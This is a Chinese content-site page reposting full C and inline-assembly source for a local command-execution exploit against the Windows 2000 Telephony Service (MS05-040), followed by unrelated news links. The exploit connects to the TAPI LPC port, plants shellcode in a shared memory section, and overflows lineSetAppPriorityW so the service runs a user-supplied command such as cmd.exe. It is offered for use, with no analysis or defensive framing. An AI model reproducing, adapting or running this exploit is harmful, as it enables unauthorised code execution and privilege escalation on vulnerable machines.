王朝网络
分享
 
 
 

MS Windows Telephony Service Command Execution Exploit (MS05-040)

王朝system·作者佚名  2006-04-18
宽屏版  字体: |||超大  

// by Cesar Cerrudo - Argeniss - www.argeniss.com

//

// TAPI Vulnerability- MS05-040

//

// Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language

// If Telephony Service is not running you can start it by net start "Telephony Service"

#include "windows.h"

#include "stdio.h"

#include "tapi.h"

typedef struct _UNICODE_STRING {

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} UNICODE_STRING;

typedef struct LpcSectionMapInfo{

DWORD Length;

DWORD SectionSize;

DWORD ServerBaseAddress;

} LPCSECTIONMAPINFO;

typedef struct LpcSectionInfo {

DWORD Length;

HANDLE SectionHandle;

DWORD Param1;

DWORD SectionSize;

DWORD ClientBaseAddress;

DWORD ServerBaseAddress;

} LPCSECTIONINFO;

#define SHARED_SECTION_SIZE 0x1000

typedef struct _OBJDIR_INFORMATION {

UNICODE_STRING ObjectName;

UNICODE_STRING ObjectTypeName;

BYTE Data[1];

} OBJDIR_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {

ULONG Length;

HANDLE RootDirectory;

UNICODE_STRING *ObjectName;

ULONG Attributes;

PVOID SecurityDescriptor;

PVOID SecurityQualityOfService;

} OBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES ); (p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; }

WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100);

LPVOID lpLocalAddress,lpTargetAddress;

DWORD ConnectToLPCPort(){

HMODULE hNtdll;

HANDLE hPort;

LPCSECTIONINFO sectionInfo;

LPCSECTIONMAPINFO mapInfo;

byte ConnectDataBuffer[100];

DWORD Size = sizeof(ConnectDataBuffer);

WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port

DWORD i;

UNICODE_STRING uStr;

for (i=0;i<100;i++)

ConnectDataBuffer[i]=0x0;

hNtdll=LoadLibrary("ntdll.dll");

DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*);

pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort");

DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD);

pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection");

HANDLE hSection;

LARGE_INTEGER SecSize;

DWORD maxSize=0;

SecSize.LowPart=0x1000;

SecSize.HighPart=0x0;

SECURITY_QUALITY_OF_SERVICE qos;

DWORD qosSize=4;

qos.Length =(DWORD)&qosSize;

qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2;

qos.ContextTrackingMode =0x01000101;

qos.EffectiveOnly =0x10000;

//create shared section

pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);

memset(&sectionInfo, 0, sizeof(sectionInfo));

memset(&mapInfo, 0, sizeof(mapInfo));

sectionInfo.Length = 0x18;

sectionInfo.SectionHandle =hSection;

sectionInfo.SectionSize = SHARED_SECTION_SIZE;

mapInfo.Length = 0x0C;

uStr.Length = wcslen(uString)*2;

uStr.MaximumLength = wcslen(uString)*2+2;

uStr.Buffer =uString;

//connect to LPC port

if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){

lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ;

lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ;

return 1;

}

return 0;

}

int main(int argc, char* argv[])

{

HMODULE hKernel;

DWORD iStrLen;

FARPROC pWinExec,pExitThread;

LPSTR sCommand;

if (!argv[1]) {

printf("\nUsage :\nTapiExploit \"command\" \n");

printf("\nExample :\n TapiExploit \"cmd.exe\" \n");

exit(0);

}

iStrLen=strlen(argv[1]);

if(iStrLen>=65){

printf("\n\"command\" must be less than 65 chars.\n");

exit(0);

}

sCommand=argv[1];

if (!ConnectToLPCPort()){ //connect to TAPI LPC port

printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again.");

exit(0);

}

hKernel=LoadLibrary("Kernel32.dll");

// pWinExec=GetProcAddress(hKernel,"WinExec");

pWinExec=GetProcAddress(hKernel,"CreateProcessA");

pExitThread=GetProcAddress(hKernel,"ExitThread");

CHAR sWinSta[]="WinSta0\\Default";

//copy shellcode

_asm {

pushad

lea esi, Shellcode

mov edi, lpLocalAddress

add edi, 0x10

lea ecx, End

sub ecx, esi

push esi

push edi

cld

rep movsb

pop edi

pop esi

push edi

lea ecx, CommandBuf

sub ecx, esi

add edi, ecx

mov esi, sCommand

mov ecx, iStrLen

rep movsb

mov [edi], 0x00

pop edi

mov esi, pWinExec

mov [edi+0x0a], esi

mov esi, pExitThread

mov [edi+0x0e], esi

//////////////

add edi, 0x2f0

lea esi, sWinSta

mov ecx, 0xf

cld

rep movsb

///////////////

jmp Done

Shellcode:

jmp Start

// this gets overwritten

mov ax,0xffff

mov ax,0xffff

mov ax,0xffff

mov ax,0xffff

CommandBuf:// this gets overwritten

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

mov dword ptr[eax],0x55555555

Start:

call getDelta

getDelta:

pop edx// Get shellcode/shared section pointer

push edx

/*push 0x1// push 0x0 for hidden window

lea eax, [edx-0x47]

push eax// Command offset

call [edx-0x4f]// Call WinExec

*/

mov eax, edx

add eax,0x500

push eax//LPPROCESS_INFORMATION

add eax, 0x100

mov ebx, edx

xor bl, bl

lea ecx, [ebx+0x300]

lea ebx, [eax+0x8]

mov [ebx], ecx//set windows station and desktop

push eax//LPSTARTUPINFO

push 0x0

push 0x0

push 0x0

push 0x0

push 0x0

push 0x0

lea eax, [edx-0x47]

push eax// Command offset

push 0x0

call [edx-0x4f]// Call create process

pop edx

call [edx-0x4b]// Call ExitThread

End:

Done:

popad

}

LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ;

LINEEXTENSIONID ExtensionID;

memset(lpszAppFilename,0x58,0x21A);

_asm{

pushad

mov ebx, lpszAppFilename

lea ebx, [ebx+0x216]

mov eax, lpTargetAddress

add eax, 0x10

mov [ebx], eax

popad

}

lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL);

Sleep(1000);

printf("Command should have been executed ;)\n");

return 0;

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
>>返回首页<<
推荐阅读
 
 
频道精选
 
静静地坐在废墟上,四周的荒凉一望无际,忽然觉得,凄凉也很美
© 2005- 王朝网络 版权所有